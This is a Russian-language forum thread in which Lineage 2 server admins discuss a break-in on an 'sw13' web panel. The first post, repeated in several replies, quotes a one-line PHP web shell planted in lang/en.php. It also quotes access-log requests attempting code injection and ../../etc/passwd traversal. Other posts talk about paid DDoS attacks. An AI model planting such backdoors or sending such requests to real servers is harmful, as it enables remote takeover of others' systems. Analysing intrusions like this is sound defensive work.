нужна помощь Взлом sw13

[S1Frost 61]

Собственно ломанули sw13,ломал всем известный GOVNO11000

был затронут только один файл sw13/lang/en.php (судя по датам изменение)

после беглого осмотра в нём в начале текста появилось следующие:

if(isset($_GET['Ww'])){
$_REQUEST['Ww']($_COOKIE['WwW']);}

лог веб сервера

error.log

index.php'if(isset($_GET['Ww'])){  $_REQUEST['Ww']($_COOKIE['WwW']);}  if (!defined("STRESSWEB"))  die("Access denied...");  $lang = array(
/application/.htaccess: Invalid command '\xef\xbb\xbfOrder', perhaps misspelled or defined by a module not included in the server configuration

access.log

"GET /index.php?f=en%27
"GET /index.php?f=en?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /index.php'if(isset($_GET['Ww']))%7B%20%20$_REQUEST['Ww']($_COOKIE['WwW']);%7D%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php
"GET /application/en.php?session?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../etc/passwd
"GET /etc/passwd

Собственно есть у кого какие мысли как был точно осуществлён взлом,так как на протяжение нескольких лет многих кого взломали через этот самый en.php

 

но логи не кто так и не предоставлял в массы

Изменено 22 февраля, 2017 пользователем S1Frost

[ImSpoke 22]

А св лицензия была?

[S1Frost 61]

чистый св от одного из клиентов + много раскодированных от кубика файлов

[qwanta123 10]

за бабос помогу решить вопрос

[S1Frost 61]

дурыку уже прикрыл,просто в массы как ломает гавно,обломать его бизнес

[qwanta123 10]

Не обламаешь ты его бизнес, потому что он будет ддосить.

[CrazyCort 26]

Опять одно и тоже.Уже говорили что он не трогает говно проекты.

Так что это не он 100%.

[S1Frost 61]

Опять одно и тоже.Уже говорили что он не трогает говно проекты.

Так что это не он 100%.

именно он это был...

[sniper 47]

у тя какой онлайн только чесно??

[Desquire 451]

Если можешь, поставь св на котором был взломан, и ссылочку в лк. буду благодарен.

[drakola 10]

Может и мой сайт взломает или досс хочу посмотреть свою защиту на прочность ) 

кто сможет это сделать пишите в личку я скину ссылку на сайт

тут писать не буду а то скажут что реклама.

[hellEVIL 9]

Запросами GET можно только посмотреть или дернуть исполняемый файл. Вредоносный код судя по всему как то подругому залили.

[WINNER 12]

Собственно ломанули sw13,ломал всем известный GOVNO11000

был затронут только один файл sw13/lang/en.php (судя по датам изменение)

после беглого осмотра в нём в начале текста появилось следующие:

if(isset($_GET['Ww'])){
$_REQUEST['Ww']($_COOKIE['WwW']);}

лог веб сервера

error.log

index.php'if(isset($_GET['Ww'])){  $_REQUEST['Ww']($_COOKIE['WwW']);}  if (!defined("STRESSWEB"))  die("Access denied...");  $lang = array(
/application/.htaccess: Invalid command '\xef\xbb\xbfOrder', perhaps misspelled or defined by a module not included in the server configuration

access.log

"GET /index.php?f=en%27
"GET /index.php?f=en?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /index.php'if(isset($_GET['Ww']))%7B%20%20$_REQUEST['Ww']($_COOKIE['WwW']);%7D%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php
"GET /application/en.php?session?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../etc/passwd
"GET /etc/passwd

Собственно есть у кого какие мысли как был точно осуществлён взлом,так как на протяжение нескольких лет многих кого взломали через этот самый en.php

 

но логи не кто так и не предоставлял в массы

Желательно поставить данную платформы и посмотреть если есть такая возможность поставь  и ссылку дай будем смотреть  а там уже будем решать .

[sniper 47]

Говно вроде только  от 1к онлайн приходит Иначе смысла нет ему!

[qwanta123 10]

вы не правы, он щас ходит по всем серверам, скатился видимо )

Потому что мелкие сервера отбивают часть онлайна у крупных, а крупные сервера ему платят.

По этому он убивает мелкие сервера, кароче скоро л2 вымрет, если каждый второй серв на старте будет фейлится из за гавна

[M1SHA 136]

респект говну_) давно пора убивать одно дневние сервера))))

[qwanta123 10]

респект говну_) давно пора убивать одно дневние сервера))))

Это говорит человек, который не покупает обширную рекламу ? За счет чего его гавно не видит, и соответственно не ддосит, так как ты никому не нужен

Ты же кричал что каждую неделю по серверу открываешь, это разве не однодневка ?

А гавно убивает нормальные проекты, которые могут дать хоть небольшую, но все же конкуренцию топовым проектам.

На твой сервер ему вообще похрен, тебя на том же упсе нет даже (согласен, это далеко не показатель но все же)

[M1SHA 136]

Это говорит человек, который не покупает обширную рекламу ? За счет чего его гавно не видит, и соответственно не ддосит, так как ты никому не нужен

Ты же кричал что каждую неделю по серверу открываешь, это разве не однодневка ?

А гавно убивает нормальные проекты, которые могут дать хоть небольшую, но все же конкуренцию топовым проектам.

На твой сервер ему вообще похрен, тебя на том же упсе нет даже (согласен, это далеко не показатель но все же)

Уважаемий я отличие от других купил себе обвязку у програмиста со своего города)))) откуда ти знаеш что я покупаю а что нет? у меня есть проекти как для неделбних стартов так и лоу рейти ... если я дето и дедлился инфой что и как я делаю ето незначит что я сливал все о себе)))) да и прежди чем делать такие виводи удостовертесь в том что действительно етот как все его називают некрасиво ломает токо вип проекти) своим постом я всего лиш хотел подчеркнуть что те люди которие достали сборку путем обмана либло откриваютса токо прочитав несколько мануалов на макси или на другом форуме и поставив сборку на свой пк обманивают играков и за сутки собрав донейт закривают проект! а люди вместо мало извесних проектов которие токо начинают свой путь идут на обширние проекти с покупними кланами де при сливе кланов после валакаса все топают на другой сервер ! люди должни играть и там де нет покупних кланов так как ето намного интересние! я вот свой посл проект попробовал открить в автомат режиме (без общение по форуму аське без клан бонусов и тд!) сервер на ура открился с 330 онолайна а  люди в игре думали какбудто 1к живого когда их спрашивали новички скоко онлайна! PS если ви попитаетесь меня дизморалить за щет моей граматики по рускому язику то ето напрасно! я давно уже негонюсь за репутацией на форуме и тд так как с моим знанием токо укр ито недосконально ето напрасно ) а зайти написать под пивчанский пост второй ето гуд! а щео на то что вы уважаемий вспомнили анонс в вашом сообщение на котором вас нету так тут все просто на упсе жизнь незаканчиваетса) ещо есть л2топ а также яндекс дирек) удачи вам и набудущие если захотите подизморалить когото то найдите соседа или брата или кореша и там дизморальте а мне как било всеравно на вас так и будет!

[terege 110]

Собственно ломанули sw13,ломал всем известный GOVNO11000

был затронут только один файл sw13/lang/en.php (судя по датам изменение)

после беглого осмотра в нём в начале текста появилось следующие:

if(isset($_GET['Ww'])){
$_REQUEST['Ww']($_COOKIE['WwW']);}

лог веб сервера

error.log

index.php'if(isset($_GET['Ww'])){  $_REQUEST['Ww']($_COOKIE['WwW']);}  if (!defined("STRESSWEB"))  die("Access denied...");  $lang = array(
/application/.htaccess: Invalid command '\xef\xbb\xbfOrder', perhaps misspelled or defined by a module not included in the server configuration

access.log

"GET /index.php?f=en%27
"GET /index.php?f=en?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /index.php'if(isset($_GET['Ww']))%7B%20%20$_REQUEST['Ww']($_COOKIE['WwW']);%7D%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php
"GET /application/en.php?session?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../etc/passwd
"GET /etc/passwd

Собственно есть у кого какие мысли как был точно осуществлён взлом,так как на протяжение нескольких лет многих кого взломали через этот самый en.php

 

но логи не кто так и не предоставлял в массы

 мной sw13 перебазированная   под выше php версии и правки капчи  и малой тюнингу

из выше перечисленных

щелей не сработало 

есть у кого еще список  способа взлома

[M1SHA 136]

 мной sw13 перебазированная   под выше php версии и правки капчи  и малой тюнингу

из выше перечисленных

щелей не сработало 

есть у кого еще список  способа взлома

Я хоть и несильно знаюсь на хакерах и взломах но посл рас общяясь с человеком которий сливал мне за деньги уязвимость моего проекта он наголосил что любой хакер внедряя свой вредоносний код оставляет фейковие слиди имхо его взлом бистро пофиксят и он будет никто и звать его некак ) скорее всего в вашем случяее гавно просто оставил фейковой след ... но и ето всеголиш предположение в моем посте!

[qwanta123 10]

Уважаемий я отличие от других купил себе обвязку у програмиста со своего города)))) откуда ти знаеш что я покупаю а что нет? у меня есть проекти как для неделбних стартов так и лоу рейти ... если я дето и дедлился инфой что и как я делаю ето незначит что я сливал все о себе)))) да и прежди чем делать такие виводи удостовертесь в том что действительно етот как все его називают некрасиво ломает токо вип проекти) своим постом я всего лиш хотел подчеркнуть что те люди которие достали сборку путем обмана либло откриваютса токо прочитав несколько мануалов на макси или на другом форуме и поставив сборку на свой пк обманивают играков и за сутки собрав донейт закривают проект! а люди вместо мало извесних проектов которие токо начинают свой путь идут на обширние проекти с покупними кланами де при сливе кланов после валакаса все топают на другой сервер ! люди должни играть и там де нет покупних кланов так как ето намного интересние! я вот свой посл проект попробовал открить в автомат режиме (без общение по форуму аське без клан бонусов и тд!) сервер на ура открился с 330 онолайна а  люди в игре думали какбудто 1к живого когда их спрашивали новички скоко онлайна! PS если ви попитаетесь меня дизморалить за щет моей граматики по рускому язику то ето напрасно! я давно уже негонюсь за репутацией на форуме и тд так как с моим знанием токо укр ито недосконально ето напрасно ) а зайти написать под пивчанский пост второй ето гуд! а щео на то что вы уважаемий вспомнили анонс в вашом сообщение на котором вас нету так тут все просто на упсе жизнь незаканчиваетса) ещо есть л2топ а также яндекс дирек) удачи вам и набудущие если захотите подизморалить когото то найдите соседа или брата или кореша и там дизморальте а мне как било всеравно на вас так и будет!

Извините, больше не буду с вами спорить, вы правы, вы лучший

[sniper 47]

Хм неужели даже проекты 50-150 онлайн он стал валить?

[M1SHA 136]

Извините, больше не буду с вами спорить, вы правы, вы лучший

Вы мне лстите сударь)))Спасибо добра вам)

[qwanta123 10]

Хм неужели даже проекты 50-150 онлайн он стал валить?

не знаю как 150, но 300 онлайна валит бывает

[sniper 47]

и сколько требуют бабла???

300 это уже средний онлайн на тех же допах даже топы МЭД арес Мун ланд макс 500 собирают а то и все 350